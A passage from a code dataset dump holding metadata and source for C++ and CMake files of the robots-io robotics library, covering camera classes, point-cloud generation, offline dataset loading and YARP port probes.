std::endl;\n}\n\n\nRealsenseCameraYarp::~RealsenseCameraYarp()\n{}\n"
},
{
"alpha_fraction": 0.5812591314315796,
"alphanum_fraction": 0.5871156454086304,
"avg_line_length": 26.689189910888672,
"blob_id": "f2a42944dd2b49ca7d9d0dabedefdae113845d06",
"content_id": "0d0f636b051197d446456646216aac0383137f1d",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2049,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 74,
"path": "/src/RobotsIO/test/test_DatasetSpatialVelocity/main.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2020 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <cstdlib>\n#include <iostream>\n\n#include <RobotsIO/Utils/DatasetSpatialVelocity.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\n\n\nbool parse_size_t (char** argv, const std::size_t& index, const std::string& name, std::size_t& retrieved);\n\n\nint main(int argc, char** argv)\n{\n const std::string log_name = \"test_DatasetSpatialVelocity\";\n\n if (argc != 4)\n {\n std::cerr << \"Synopsis: \" + log_name + \" <dataset_path> <skip_rows> <skip_cols>\" << std::endl << std::endl;\n\n return EXIT_FAILURE;\n }\n\n const std::string dataset_path{argv[1]};\n\n std::size_t skip_rows;\n if (!parse_size_t(argv, 2, \"skip_rows\", skip_rows))\n return EXIT_FAILURE;\n\n std::size_t skip_cols;\n if (!parse_size_t(argv, 3, \"skip_cols\", skip_cols))\n return EXIT_FAILURE;\n\n DatasetSpatialVelocity dataset(dataset_path, skip_rows, skip_cols, 6);\n\n std::size_t i = 0;\n while (dataset.freeze())\n {\n auto linear_velocity = dataset.linear_velocity_origin();\n auto angular_velocity = dataset.angular_velocity();\n std::cout << i++ << \": \"\n << linear_velocity.transpose() << \" \"\n << angular_velocity.transpose() << \" \"\n << \"(degenerate: \" << (dataset.is_screw_degenerate() ? \"true\" : \"false\") << \") \"\n << std::endl;\n }\n\n return EXIT_SUCCESS;\n}\n\n\nbool parse_size_t (char** argv, const std::size_t& index, const std::string& name, std::size_t& retrieved)\n{\n try\n {\n if (std::stoi(argv[index]) < 0)\n throw(std::invalid_argument(\"\"));\n retrieved = std::stoul(argv[index]);\n }\n catch (std::invalid_argument)\n {\n std::cerr << \"Invalid value \" << argv[index] << \" for parameter <\" << name << \">.\" << std::endl;\n return false;\n }\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.5983827710151672,
"alphanum_fraction": 0.6145552396774292,
"avg_line_length": 31.2608699798584,
"blob_id": "51caeec1af849d0752d99bc6d7f1cbb3a5c310d3",
"content_id": "7e89351af2c4c80efbe0b5d8f4a1c75fd809b7be",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 742,
"license_type": "permissive",
"max_line_length": 112,
"num_lines": 23,
"path": "/src/RobotsIO/test/Utils/YarpImageOfMonoFloat/CMakeLists.txt",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "#===============================================================================\n#\n# Copyright (C) 2022 Istituto Italiano di Tecnologia (IIT)\n#\n# This software may be modified and distributed under the terms of the\n# BSD 3-Clause license. See the accompanying LICENSE file for details.\n#\n#===============================================================================\n\ncmake_minimum_required(VERSION 3.10)\n\nset(CMAKE_CXX_STANDARD 14)\n\nproject(test_YarpImageOfMonoFloat)\n\nfind_package(RobotsIO)\nfind_package(YARP REQUIRED COMPONENTS os)\nfind_package(OpenCV REQUIRED)\nfind_package(Eigen3 REQUIRED)\n\nadd_executable(test main.cpp)\n\ntarget_link_libraries(test PUBLIC RobotsIO::RobotsIO YARP::YARP_init YARP::YARP_os ${OpenCV_LIBS} Eigen3::Eigen)\n"
},
{
"alpha_fraction": 0.7189672589302063,
"alphanum_fraction": 0.7259185910224915,
"avg_line_length": 20.89130401611328,
"blob_id": "faf4932e68385d39b5bcda4111283b4ddbf29351",
"content_id": "c04e0b884829bf58da7e1923fab3a48eea6584fc",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1007,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 46,
"path": "/src/RobotsIO/src/Utils/FloatMatrixYarpPort.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/FloatMatrixYarpPort.h>\n\n#include <opencv2/core/eigen.hpp>\n\n#include <yarp/cv/Cv.h>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Utils;\nusing namespace yarp::cv;\nusing namespace yarp::sig;\n\n\nFloatMatrixYarpPort::FloatMatrixYarpPort(const std::string& port_name) :\n YarpBufferedPort<yarp::sig::ImageOf<yarp::sig::PixelFloat>>(port_name)\n{}\n\nFloatMatrixYarpPort::~FloatMatrixYarpPort()\n{}\n\n\nbool FloatMatrixYarpPort::freeze(const bool blocking)\n{\n ImageOf<PixelFloat>* image_float_yarp = receive_data(blocking);\n\n if (image_float_yarp == nullptr)\n return false;\n\n cv::Mat image_float_cv = toCvMat(*image_float_yarp);\n\n cv::cv2eigen(image_float_cv, matrix_);\n\n return true;\n}\n\n\nMatrixXf FloatMatrixYarpPort::matrix()\n{\n return matrix_;\n}\n"
},
{
"alpha_fraction": 0.5680294036865234,
"alphanum_fraction": 0.5733290314674377,
"avg_line_length": 27.405529022216797,
"blob_id": "f52180e96e6b7935dd778fe9e37212b0bd3d2ef2",
"content_id": "7713e9dd69f436798bb87b811a9c23adf3126e9c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 18492,
"license_type": "permissive",
"max_line_length": 188,
"num_lines": 651,
"path": "/src/RobotsIO/src/Camera/Camera.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <utility>\n// #ifdef _OPENMP\n// #include <omp.h>\n// #endif\n\n#include <RobotsIO/Camera/Camera.h>\n#include <RobotsIO/Camera/CameraDeprojectionMatrix.h>\n#include <RobotsIO/Utils/FileToDepth.h>\n#include <RobotsIO/Utils/Parameters.h>\n\n#include <opencv2/core/eigen.hpp>\n\n#include <iomanip>\n#include <iostream>\n\nusing namespace Eigen;\nusing namespace RobotsIO::Camera;\nusing namespace RobotsIO::Utils;\n\n\nCamera::Camera()\n{}\n\n\nCamera::~Camera()\n{}\n\n\nbool Camera::status() const\n{\n return status_;\n}\n\n\nbool Camera::reset()\n{\n if (is_offline())\n frame_index_ = -1;\n\n status_ = true;\n\n return true;\n}\n\n\nstd::pair<bool, MatrixXd> Camera::deprojection_matrix() const\n{\n if (!deprojection_matrix_initialized_)\n return std::make_pair(false, MatrixXd());\n\n return std::make_pair(true, deprojection_matrix_);\n}\n\n\nstd::pair<bool, CameraParameters> Camera::parameters() const\n{\n if (!(parameters_.initialized()))\n return std::make_pair(false, CameraParameters());\n\n return std::make_pair(true, parameters_);\n}\n\n\nstd::pair<bool, Eigen::MatrixXd> Camera::point_cloud\n(\n const bool& blocking,\n const double& maximum_depth,\n const bool& use_root_frame,\n const bool& enable_colors\n)\n{\n /* Get rgb, if required. */\n bool valid_rgb = false;\n cv::Mat rgb;\n if (enable_colors)\n {\n std::tie(valid_rgb, rgb) = this->rgb(blocking);\n if (!valid_rgb)\n return std::make_pair(false, MatrixXd());\n }\n\n /* Get depth. */\n bool valid_depth = false;\n MatrixXf depth;\n std::tie(valid_depth, depth) = this->depth(blocking);\n if (!valid_depth)\n return std::make_pair(false, MatrixXd());\n\n\n /* Get pose, if required. */\n bool valid_pose = false;\n Transform<double, 3, Affine> camera_pose;\n if (use_root_frame)\n {\n std::tie(valid_pose, camera_pose) = this->pose(blocking);\n if (!valid_pose)\n return std::make_pair(false, MatrixXd());\n }\n\n /* Find 3D points having positive and less than max_depth_ depth. */\n MatrixXi valid_points(parameters_.height(), parameters_.width());\n// #pragma omp parallel for collapse(2)\n for (std::size_t v = 0; v < parameters_.height(); v++)\n {\n for (std::size_t u = 0; u < parameters_.width(); u++)\n {\n valid_points(v, u) = 0;\n\n float depth_u_v = depth(v, u);\n\n if ((depth_u_v > 0) && (depth_u_v < maximum_depth))\n valid_points(v, u) = 1;\n }\n }\n const std::size_t number_valids = valid_points.sum();\n\n if (number_valids == 0)\n return std::make_pair(false, MatrixXd());\n\n /* Get deprojection matrix. */\n bool valid_deprojection_matrix = false;\n MatrixXd deprojection_matrix;\n std::tie(valid_deprojection_matrix, deprojection_matrix) = this->deprojection_matrix();\n if (!valid_deprojection_matrix)\n return std::make_pair(false, MatrixXd());\n\n /* Store points in the output matrix. */\n const std::size_t number_rows = enable_colors ? 6 : 3;\n MatrixXd cloud(number_rows, number_valids);\n std::size_t counter = 0;\n for (std::size_t v = 0; v < parameters_.height(); v++)\n for (std::size_t u = 0; u < parameters_.width(); u++)\n {\n if (valid_points(v, u) == 1)\n {\n /* Set 3D point. */\n cloud.col(counter).head<3>() = deprojection_matrix.col(u * parameters_.height() + v) * depth(v, u);\n\n if (enable_colors)\n {\n /* Set RGB channels. */\n cv::Vec3b cv_color = rgb.at<cv::Vec3b>(cv::Point2d(u, v));\n cloud.col(counter)(3) = cv_color[2];\n cloud.col(counter)(4) = cv_color[1];\n cloud.col(counter)(5) = cv_color[0];\n }\n counter++;\n }\n }\n\n /* Express taking into account the camera pose, if required. */\n if (use_root_frame)\n cloud.topRows<3>() = camera_pose * cloud.topRows<3>().colwise().homogeneous();\n\n return std::make_pair(true, cloud);\n}\n\n\nstd::pair<bool, double> Camera::time_stamp_rgb() const\n{\n return std::make_pair(false, 0.0);\n}\n\n\nstd::pair<bool, double> Camera::time_stamp_depth() const\n{\n return std::make_pair(false, 0.0);\n}\n\n\nstd::pair<bool, VectorXd> Camera::auxiliary_data(const bool& blocking)\n{\n return std::make_pair(false, VectorXd());\n}\n\n\nstd::size_t Camera::auxiliary_data_size() const\n{\n return 0;\n}\n\n\nstd::int32_t Camera::frame_index() const\n{\n if (is_offline())\n return frame_index_ + dataset_parameters_.index_offset();\n\n return -1;\n}\n\n\nbool Camera::is_offline() const\n{\n return offline_mode_;\n}\n\n\nbool Camera::set_frame_index(const std::int32_t& index)\n{\n if (int(index - dataset_parameters_.index_offset()) < 0)\n frame_index_ = -1;\n else\n frame_index_ = index - dataset_parameters_.index_offset();\n\n return true;\n}\n\n\nbool Camera::step_frame()\n{\n if (is_offline())\n {\n /* Probes for parameters output. */\n if (is_probe(\"camera_parameters_output\"))\n get_probe(\"camera_parameters_output\").set_data(parameters_.parameters());\n\n if (is_probe(\"dataset_parameters_output\"))\n get_probe(\"dataset_parameters_output\").set_data(dataset_parameters_.parameters());\n\n frame_index_++;\n\n if ((frame_index_ + 1) > number_frames_)\n {\n status_ = false;\n\n return false;\n }\n }\n\n return true;\n}\n\n\nbool Camera::log_frame(const bool& log_depth)\n{\n /* Get rgb image. */\n bool valid_rgb = false;\n cv::Mat rgb_image;\n std::tie(valid_rgb, rgb_image) = rgb(true);\n if (!valid_rgb)\n return false;\n\n /* TODO: complete implementation. */\n /* Get depth image. */\n bool valid_depth = false;\n MatrixXf depth;\n if (log_depth)\n {}\n\n /* Get camera pose .*/\n bool valid_pose = false;\n Transform<double, 3, Affine> camera_pose;\n std::tie(valid_pose, camera_pose) = pose(true);\n if (!valid_pose)\n return false;\n\n /* Get auxiliary data. */\n bool is_aux_data = false;\n VectorXd aux_data;\n std::tie(is_aux_data, aux_data) = auxiliary_data(true);\n\n /* Eigen precision format .*/\n IOFormat full_precision(FullPrecision);\n\n /* Save frame .*/\n AngleAxisd angle_axis(camera_pose.rotation());\n VectorXd angle(1);\n angle(0) = angle_axis.angle();\n\n if (valid_rgb)\n cv::imwrite(log_path_ + \"rgb_\" + std::to_string(log_index_) + \".\" + dataset_parameters_.rgb_format(), rgb_image);\n if (valid_depth)\n ;\n log_ << log_index_ << \" \"\n << camera_pose.translation().transpose().format(full_precision) << \" \"\n << angle_axis.axis().transpose().format(full_precision) << \" \"\n << angle.format(full_precision);\n\n if (is_aux_data)\n log_ << \" \" << aux_data.transpose().format(full_precision);\n\n log_ << std::endl;\n\n log_index_++;\n\n return true;\n}\n\n\nbool Camera::start_log(const std::string& path)\n{\n log_path_ = path;\n if (log_path_.back() != '/')\n log_path_ += \"/\";\n\n log_.open(log_path_ + \"data.txt\");\n\n log_index_ = 0;\n\n return log_.is_open();\n}\n\n\nbool Camera::stop_log()\n{\n log_.close();\n\n return !log_.fail();\n}\n\n\nbool Camera::initialize()\n{\n bool ok = true;\n\n /* Cache the deprojection matrix once for all. */\n ok &= evaluate_deprojection_matrix();\n\n /* If offline mode, load data from file. */\n if (is_offline())\n {\n bool valid_data = false;\n std::tie(valid_data, data_) = load_data();\n if (!valid_data)\n throw(std::runtime_error(log_name_ + \"::initialize. Cannot load offline data from \" + dataset_parameters_.path()));\n }\n\n return ok;\n}\n\n\nbool Camera::evaluate_deprojection_matrix()\n{\n if (!parameters_.initialized())\n throw(std::runtime_error(log_name_ + \"::reset. Camera parameters not initialized. Did you initialize the class member 'parameters_' in the derived class?.\"));\n\n // Evaluate deprojection matrix\n deprojection_matrix_ = RobotsIO::Camera::deprojection_matrix(parameters_);\n\n deprojection_matrix_initialized_ = true;\n\n return true;\n}\n\n\nCamera::Camera\n(\n const std::string& data_path,\n const std::size_t& width,\n const std::size_t& height,\n const double& fx,\n const double& cx,\n const double& fy,\n const double& cy\n) :\n offline_mode_(true)\n{\n /* Set intrinsic parameters. */\n parameters_.width(width);\n parameters_.height(height);\n parameters_.fx(fx);\n parameters_.cx(cx);\n parameters_.fy(fy);\n parameters_.cy(cy);\n parameters_.initialized(true);\n\n /* Set dataset parameters. */\n dataset_parameters_.path(data_path);\n\n /* Fix data path. */\n if (dataset_parameters_.path().back() != '/')\n dataset_parameters_.path(dataset_parameters_.path() + '/');\n\n /* Log parameters. */\n std::cout << log_name_ + \"::ctor. Camera parameters:\" << std::endl;\n std::cout << log_name_ + \" - width: \" << parameters_.width() << std::endl;\n std::cout << log_name_ + \" - height: \" << parameters_.height() << std::endl;\n std::cout << log_name_ + \" - fx: \" << parameters_.fx() << std::endl;\n std::cout << log_name_ + \" - fy: \" << parameters_.fy() << std::endl;\n std::cout << log_name_ + \" - cx: \" << parameters_.cx() << std::endl;\n std::cout << log_name_ + \" - cy: \" << parameters_.cy() << std::endl;\n}\n\n\nstd::pair<bool, MatrixXf> Camera::depth_offline()\n{\n if (!status())\n return std::make_pair(false, MatrixXf());\n\n const std::string file_name = dataset_parameters_.path() + dataset_parameters_.depth_prefix() + compose_index(frame_index() + depth_offset_) + \".\" + dataset_parameters_.depth_format();\n\n MatrixXf float_image;\n bool valid_image = false;\n std::tie(valid_image, float_image) = file_to_depth(file_name);\n if (!valid_image)\n return std::make_pair(false, MatrixXf());\n\n /* Resize image. */\n MatrixXf depth;\n bool is_resize = false;\n if ((parameters_.width() != 0) && (parameters_.height() != 0))\n {\n if ((float_image.cols() > parameters_.width()) && (float_image.rows() > parameters_.height()))\n {\n if ((float_image.cols() % parameters_.width() == 0) && ((float_image.rows() % parameters_.height() == 0)))\n {\n std::size_t ratio = float_image.cols() / parameters_.width();\n if (ratio == (float_image.rows() / parameters_.height()))\n {\n depth.resize(parameters_.height(), parameters_.width());\n for (std::size_t i = 0; i < float_image.rows(); i += ratio)\n for (std::size_t j = 0; j < float_image.cols(); j += ratio)\n depth(i / ratio, j / ratio) = float_image(i, j);\n\n is_resize = true;\n }\n }\n }\n }\n\n if (!is_resize)\n depth = float_image;\n\n /* Probe for depth output. */\n cv::Mat depth_cv;\n cv::eigen2cv(depth, depth_cv);\n if (is_probe(\"depth_output\"))\n get_probe(\"depth_output\").set_data(depth_cv);\n\n return std::make_pair(true, depth);\n}\n\n\nstd::pair<bool, Transform<double, 3, Affine>> Camera::pose_offline()\n{\n if (!status())\n return std::make_pair(false, Transform<double, 3, Affine>());\n\n if (dataset_parameters_.data_available())\n {\n VectorXd data = data_.col(frame_index_);\n\n Vector3d position = data.segment<3>(2);\n VectorXd axis_angle = data.segment<4>(2 + 3);\n AngleAxisd angle_axis(axis_angle(3), axis_angle.head<3>());\n\n Transform<double, 3, Affine> pose;\n pose = Translation<double, 3>(position);\n pose.rotate(angle_axis);\n\n /* Probe for pose output. */\n if (is_probe(\"pose_output\"))\n get_probe(\"pose_output\").set_data(pose);\n\n return std::make_pair(true, pose);\n }\n\n return std::make_pair(true, Transform<double, 3, Affine>::Identity());\n}\n\n\nstd::pair<bool, cv::Mat> Camera::rgb_offline()\n{\n if (!status())\n return std::make_pair(false, cv::Mat());\n\n const std::string file_name = dataset_parameters_.path() + dataset_parameters_.rgb_prefix() + compose_index(frame_index() + rgb_offset_) + \".\" + dataset_parameters_.rgb_format();\n cv::Mat image = cv::imread(file_name, cv::IMREAD_COLOR);\n\n if (image.empty())\n {\n std::cout << log_name_ << \"::rgb_offline. Warning: frame \" << file_name << \" is empty!\" << std::endl;\n return std::make_pair(false, cv::Mat());\n }\n if ((parameters_.width() != 0) && (parameters_.height() != 0))\n cv::resize(image, image, cv::Size(parameters_.width(), parameters_.height()));\n\n /* Probe for rgb output. */\n if (is_probe(\"rgb_output\"))\n get_probe(\"rgb_output\").set_data(image);\n\n return std::make_pair(true, image);\n}\n\n\nstd::pair<bool, double> Camera::time_stamp_rgb_offline() const\n{\n if (status() && dataset_parameters_.data_available())\n {\n VectorXd data = data_.col(frame_index_ + rgb_offset_);\n\n return std::make_pair(true, data(0));\n }\n\n return std::make_pair(false, 0.0);\n}\n\n\nstd::pair<bool, double> Camera::time_stamp_depth_offline() const\n{\n if (status() && dataset_parameters_.data_available())\n {\n VectorXd data = data_.col(frame_index_ + depth_offset_);\n\n return std::make_pair(true, data(1));\n }\n\n return std::make_pair(false, 0.0);\n}\n\n\nstd::pair<bool, VectorXd> Camera::auxiliary_data_offline()\n{\n if (status() && dataset_parameters_.data_available())\n {\n VectorXd data = data_.col(frame_index_);\n\n if (auxiliary_data_size() == 0)\n return std::make_pair(false, VectorXd());\n\n /* Probe for auxiliary data output. */\n if (is_probe(\"auxiliary_data_output\"))\n get_probe(\"auxiliary_data__output\").set_data(data);\n\n return std::make_pair(true, data.segment(dataset_parameters_.standard_data_offset(), auxiliary_data_size()));\n }\n\n return std::make_pair(false, VectorXd());\n}\n\n\nstd::string Camera::compose_index(const std::size_t& index)\n{\n std::ostringstream ss;\n ss << std::setw(dataset_parameters_.heading_zeros()) << std::setfill('0') << index;\n return ss.str();\n}\n\n\nstd::pair<bool, MatrixXd> Camera::load_data()\n{\n MatrixXd data;\n const std::string file_name = dataset_parameters_.path() + dataset_parameters_.data_prefix() + \"data.\" + dataset_parameters_.data_format();\n const std::size_t num_fields = dataset_parameters_.standard_data_offset() + auxiliary_data_size();\n\n std::ifstream istrm(file_name);\n if (!istrm.is_open())\n {\n std::cout << log_name_ + \"::read_data_from_file. Error: failed to open \" << file_name << std::endl;\n\n return std::make_pair(false, MatrixXd(0,0));\n }\n\n std::vector<std::string> istrm_strings;\n std::string line;\n while (std::getline(istrm, line))\n {\n istrm_strings.push_back(line);\n }\n\n dataset_parameters_.data_available(true);\n\n data.resize(num_fields, istrm_strings.size());\n std::size_t found_lines = 0;\n for (auto line : istrm_strings)\n {\n std::size_t found_fields = 0;\n std::string number_str;\n std::istringstream iss(line);\n\n while (iss >> number_str)\n {\n if (found_fields > num_fields)\n {\n std::cout << log_name_ + \"::read_data_from_file. Error: malformed input file \" << file_name << std::endl;\n std::cout << log_name_ + \"::read_data_from_file. Found more than expected fields. Skipping content parsing.\" << std::endl;\n dataset_parameters_.data_available(false);\n number_frames_ = data.cols();\n return std::make_pair(true, data);\n }\n\n try\n {\n std::size_t index = (num_fields * found_lines) + found_fields;\n *(data.data() + index) = std::stod(number_str);\n }\n catch (std::invalid_argument)\n {\n std::cout << log_name_ + \"::read_data_from_file. Error: malformed input file \" << file_name << std::endl;\n std::cout << log_name_ + \"::read_data_from_file. Found unexpected fields. Skipping content parsing.\" << std::endl;\n dataset_parameters_.data_available(false);\n number_frames_ = data.cols();\n return std::make_pair(true, data);\n }\n\n found_fields++;\n }\n\n if (found_fields != num_fields)\n {\n std::cout << log_name_ + \"::read_data_from_file. Error: malformed input file \" << file_name << std::endl;\n std::cout << log_name_ + \"::read_data_from_file. Found less than expected fields. Skipping content parsing.\" << std::endl;\n dataset_parameters_.data_available(false);\n number_frames_ = data.cols();\n return std::make_pair(true, data);\n }\n found_lines++;\n }\n\n istrm.close();\n\n number_frames_ = data.cols();\n\n if (dataset_parameters_.data_available())\n {\n // If timestamp data is available, try to synchronize rgb and depth frames.\n double timestamp_rgb_0 = data.col(0)(0);\n VectorXd timestamps_depth = data.row(1);\n VectorXd delta_rgb_depth = (timestamps_depth.array() - timestamp_rgb_0).abs();\n delta_rgb_depth.minCoeff(&depth_offset_);\n\n double timestamp_depth_0 = data.col(0)(1);\n VectorXd timestamps_rgb = data.row(0);\n VectorXd delta_depth_rgb = (timestamps_rgb.array() - timestamp_depth_0).abs();\n delta_depth_rgb.minCoeff(&rgb_offset_);\n\n if (depth_offset_ > rgb_offset_)\n {\n rgb_offset_ = 0;\n number_frames_ -= depth_offset_;\n std::cout << log_name_ + \"::read_data_from_file. RGB stream is \" << depth_offset_ << \" frames ahead of the depth stream.\";\n }\n else\n {\n depth_offset_ = 0;\n number_frames_ -= rgb_offset_;\n std::cout << log_name_ + \"::read_data_from_file. Depth stream is \" << rgb_offset_ << \" frames ahead of the RGB stream.\";\n }\n\n std::cout << \" Streams have been re-synchronized.\" << std::endl;\n }\n\n return std::make_pair(true, data);\n}\n"
},
{
"alpha_fraction": 0.7118958830833435,
"alphanum_fraction": 0.7184014916419983,
"avg_line_length": 26.58974266052246,
"blob_id": "d83f5fc08fb6f8402f71a428d6c4c8bfec074774",
"content_id": "fb6ae97a34589687ede6eb0363f598a82cb5bab0",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1076,
"license_type": "permissive",
"max_line_length": 151,
"num_lines": 39,
"path": "/src/RobotsIO/include/RobotsIO/Camera/RealsenseCameraYarp.h",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_REALSENSECAMERAYARP_H\n#define ROBOTSIO_REALSENSECAMERAYARP_H\n\n#include <RobotsIO/Camera/YarpCamera.h>\n\n#include <string>\n\nnamespace RobotsIO {\n namespace Camera {\n class RealsenseCameraYarp;\n }\n}\n\nclass RobotsIO::Camera::RealsenseCameraYarp : public RobotsIO::Camera::YarpCamera\n{\npublic:\n RealsenseCameraYarp(const std::string& port_prefix);\n\n RealsenseCameraYarp(const std::string& port_prefix, const std::size_t& width, const std::size_t& height);\n\n ~RealsenseCameraYarp();\n\nprivate:\n RealsenseCameraYarp(const std::string& port_prefix, const bool& enforce_resolution, const std::size_t& width = -1, const std::size_t& height = -1);\n /**\n * Log name to be used in messages printed by the class.\n */\n\n const std::string log_name_ = \"RealsenseCameraYarp\";\n};\n\n#endif /* ROBOTSIO_REALSENSECAMERAYARP_H */\n"
},
{
"alpha_fraction": 0.681104838848114,
"alphanum_fraction": 0.6842435598373413,
"avg_line_length": 21.43661880493164,
"blob_id": "6dc54797f35b6acdd36a4fb9b6b13dfb2d511195",
"content_id": "86159e379e405f032b37e9ba1004d2b3c910b04c",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1593,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 71,
"path": "/src/RobotsIO/include/RobotsIO/Utils/YarpImageOfProbe.hpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#ifndef ROBOTSIO_YARPIMAGEOFPROBE_H\n#define ROBOTSIO_YARPIMAGEOFPROBE_H\n\n#include <RobotsIO/Utils/Data.h>\n#include <RobotsIO/Utils/Probe.h>\n#include <RobotsIO/Utils/YarpBufferedPort.hpp>\n#include <RobotsIO/Utils/any.h>\n\n#include <string>\n\n#include <yarp/cv/Cv.h>\n#include <yarp/sig/Image.h>\n\nnamespace RobotsIO {\n namespace Utils {\n template <class T>\n class YarpImageOfProbe;\n }\n}\n\n\ntemplate <class T>\nclass RobotsIO::Utils::YarpImageOfProbe : public RobotsIO::Utils::YarpBufferedPort<yarp::sig::ImageOf<T>>,\n public RobotsIO::Utils::Probe\n{\npublic:\n YarpImageOfProbe(const std::string& port_name);\n\n virtual ~YarpImageOfProbe();\n\nprotected:\n void on_new_data() override;\n\nprivate:\n cv::Mat data_cv_;\n\n yarp::sig::ImageOf<T> data_;\n\n const std::string log_name_ = \"YarpImageOfProbe\";\n};\n\n\ntemplate <class T>\nRobotsIO::Utils::YarpImageOfProbe<T>::YarpImageOfProbe(const std::string& port_name) :\n YarpBufferedPort<yarp::sig::ImageOf<T>>(port_name)\n{}\n\n\ntemplate <class T>\nRobotsIO::Utils::YarpImageOfProbe<T>::~YarpImageOfProbe()\n{}\n\n\ntemplate <class T>\nvoid RobotsIO::Utils::YarpImageOfProbe<T>::on_new_data()\n{\n data_cv_ = RobotsIO::Utils::any_cast<cv::Mat>(get_data());\n\n data_ = yarp::cv::fromCvMat<T>(data_cv_);\n\n this->send_data(data_);\n}\n\n#endif /* ROBOTSIO_YARPIMAGEOFPROBE_H */\n"
},
{
"alpha_fraction": 0.7010309100151062,
"alphanum_fraction": 0.7083947062492371,
"avg_line_length": 20.90322494506836,
"blob_id": "9b6542a8c477551c894102c3e17a2552db0596e3",
"content_id": "bc9897468924b51813db9bbdef2a4e4280be138e",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 679,
"license_type": "permissive",
"max_line_length": 85,
"num_lines": 31,
"path": "/src/RobotsIO/src/Utils/ProbeContainer.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/ProbeContainer.h>\n\nusing namespace RobotsIO::Utils;\n\n\nProbeContainer::~ProbeContainer()\n{}\n\n\nbool ProbeContainer::is_probe(const std::string& name) const\n{\n return (probes_.find(name) != probes_.end());\n}\n\n\nProbe& ProbeContainer::get_probe(const std::string& name) const\n{\n return *(probes_.at(name));\n}\n\nvoid ProbeContainer::set_probe(const std::string& name, std::unique_ptr<Probe> probe)\n{\n probes_[name] = std::move(probe);\n}\n"
},
{
"alpha_fraction": 0.6740027666091919,
"alphanum_fraction": 0.6859238743782043,
"avg_line_length": 32.04545593261719,
"blob_id": "17906849ec04267368da4debbf6fc9a5d05fb855",
"content_id": "d5fb84114958b968062e952cd5cd7cb39b23950a",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2181,
"license_type": "permissive",
"max_line_length": 190,
"num_lines": 66,
"path": "/src/RobotsIO/src/Utils/YarpVectorOfProbe.cpp",
"repo_name": "xEnVrE/robots-io",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (C) 2019 Istituto Italiano di Tecnologia (IIT)\n *\n * This software may be modified and distributed under the terms of the\n * BSD 3-Clause license. See the accompanying LICENSE file for details.\n */\n\n#include <RobotsIO/Utils/YarpVectorOfProbe.hpp>\n\nusing namespace RobotsIO::Utils;\n\n\ntemplate <>\nyarp::sig::VectorOf<double> RobotsIO::Utils::YarpVectorOfProbe<double, Eigen::VectorXd>::convert_from(const Eigen::VectorXd& data)\n{\n yarp::sig::VectorOf<double> tmp(data.size());\n yarp::eigen::toEigen(tmp) = data;\n\n return tmp;\n}\n\n\ntemplate <>\nyarp::sig::VectorOf<double> RobotsIO::Utils::YarpVectorOfProbe<double, Eigen::Transform<double, 3, Eigen::Affine>>::convert_from(const Eigen::Transform<double, 3, Eigen::Affine>& data)\n{\n /* Assume by default transformation to x-y-z-axis-angle. */\n yarp::sig::VectorOf<double> tmp(7);\n yarp::eigen::toEigen(tmp).head<3>() = data.translation();\n\n Eigen::AngleAxisd axis_angle(data.rotation());\n yarp::eigen::toEigen(tmp).segment<3>(3) = axis_angle.axis();\n yarp::eigen::toEigen(tmp)(6) = axis_angle.angle();\n\n return tmp;\n}\n\n\ntemplate <>\nyarp::sig::VectorOf<double> RobotsIO::Utils::YarpVectorOfProbe<double, RobotsIO::Utils::TransformWithVelocityStorage>::convert_from(const RobotsIO::Utils::TransformWithVelocityStorage& data)\n{\n /* Assume by default transformation to x-y-z-axis-angle. */\n yarp::sig::VectorOf<double> tmp(13);\n yarp::eigen::toEigen(tmp).head<3>() = data.transform.translation();\n\n 